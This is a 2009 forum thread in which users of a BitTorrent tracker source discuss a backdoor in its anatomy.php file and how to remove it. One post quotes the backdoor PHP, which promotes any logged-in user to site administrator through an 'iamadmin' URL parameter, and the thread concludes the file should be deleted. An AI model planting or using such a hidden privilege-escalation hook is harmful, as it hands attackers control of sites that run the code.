wMan |
28th July 2009 18:57 |
Quote:
Originally Posted by tunad
(Post 13804)
this is my anatomy.php
|
ban users with white usernames and change anatomy.php with this
[php]
if (eregi("anatomy.php",$_SERVER["PHP_SELF"])) die ("wtf u are trying to do bich ? fixed by wolfman");
require "include/bittorrent.php";
dbconn(false);
stdhead("Torrent anatomy");
?>
Anatomy of a torrent session
(Updated to reflect the tracker changes. 14-04-2004)
There seems to be a lot of confusion about how the statistics updates work. The following is a capture of a full
session to see what's going on behind the scenes. The client communicates with the tracker via simple http GET commands. The very first in this case was:
GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9% BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0&left=753690875 &event=started
Let's dissect this:
|
Just remove anatomy.php it really isnt needed.
|
sammygo |
28th July 2009 19:02 |
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
print("Now you are one of site admins :D");
}
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
print("Your class now is 0 :(");
}
change to
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
print("Now you are Banned :D");
}
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
print("Now you are Banned :D");
}
|
tunad |
28th July 2009 19:03 |
thank you very much!!!!!
i hope this is all i have to do.
|
wMan |
28th July 2009 19:09 |
Quote:
Originally Posted by ionutzsami
(Post 13808)
change to
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
print("Now you are Banned :D");
}
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
print("Now you are Banned :D");
}
|
u still can hack it while shit like $_GET["iamadmin"] is in somewhere
either u remove anathomy ore change it to one without this crap
|
tunad |
28th July 2009 19:18 |
so al i have to do is to delete anatomy.php ok?
|
wMan |
28th July 2009 19:19 |
Quote:
Originally Posted by tunad
(Post 13811)
so al i have to do is to delete anatomy.php ok?
|
yes
|
tunad |
28th July 2009 19:27 |
i instaled the source buut now it show me in u'torrent tracker sendind invalid data ....why??
|
wMan |
28th July 2009 19:35 |
Quote:
Originally Posted by tunad
(Post 13813)
i instaled the source buut now it show me in u'torrent tracker sendind invalid data ....why??
|
because u use source that had backdoor in it
do u realy think u will get it to work ?
there is so many other good sources u know
|
All times are GMT +2. The time now is 07:07. |
|
Powered by vBulletin® Version 3.8.11 Beta 3 Copyright ©2000 - 2024, vBulletin Solutions Inc.
|
|